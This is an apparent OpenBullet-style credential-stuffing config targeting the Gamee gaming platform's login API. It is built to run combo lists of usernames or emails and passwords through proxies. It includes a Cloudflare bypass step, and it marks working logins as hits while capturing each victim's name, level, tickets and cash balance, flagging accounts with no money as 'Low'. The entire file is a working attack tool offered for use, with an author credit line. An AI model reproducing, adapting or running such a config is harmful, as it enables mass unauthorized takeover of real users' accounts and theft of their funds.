[SETTINGS]
{
  "Name": "Gamee Api",
  "SuggestedBots": 60,
  "MaxCPM": 0,
  "LastModified": "2022-02-24T10:11:25.8520272+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Gamee Api",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BYPASSCF "https://prizes.gamee.com/login" 

REQUEST GET "https://prizes.gamee.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#uuid PARSE "<COOKIES(uuid)>" LR "" "" -> VAR "uuid" 

REQUEST POST "https://api.service.gameeapp.com/" 
  CONTENT "{\"jsonrpc\":\"2.0\",\"id\":\"user.authentication.loginUsingPassword\",\"method\":\"user.authentication.loginUsingPassword\",\"params\":{\"username\":\"<USER>\",\"password\":\"<PASS>\"}}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.service.gameeapp.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: text/plain;charset=UTF-8" 
  HEADER "Content-Length: 179" 
  HEADER "x-install-uuid: <uuid>" 
  HEADER "client-language: en" 
  HEADER "Origin: https://prizes.gamee.com" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Referer: https://prizes.gamee.com/" 
  HEADER "Connection: keep-alive" 
  HEADER "TE: trailers" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password" 
    KEY "does not exist" 
  KEYCHAIN Success OR 
    KEY "{\"user\":{\"id\":" 
    KEY "\"firstname\":\"" 

#first_name PARSE "<SOURCE>" LR "\"firstname\":\"" "\"" CreateEmpty=FALSE -> CAP "First_Name" 

#Last_bame PARSE "<SOURCE>" LR "lastname\":\"" "\"" CreateEmpty=FALSE -> CAP "last_Name" 

#Level PARSE "<SOURCE>" LR "{\"level\":" ",\"" CreateEmpty=FALSE -> CAP "Level" 

#Tickets PARSE "<SOURCE>" LR "\"tickets\":{\"count\":" "}" CreateEmpty=FALSE -> CAP "Tickets" 

#Balance PARSE "<SOURCE>" LR "money\":{\"usdCents\":" "}" CreateEmpty=FALSE -> CAP "Balance" "" "$" 

KEYCHECK 
  KEYCHAIN Custom "Low" OR 
    KEY "<Balance>" LessThanOrEqual "0" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By" 

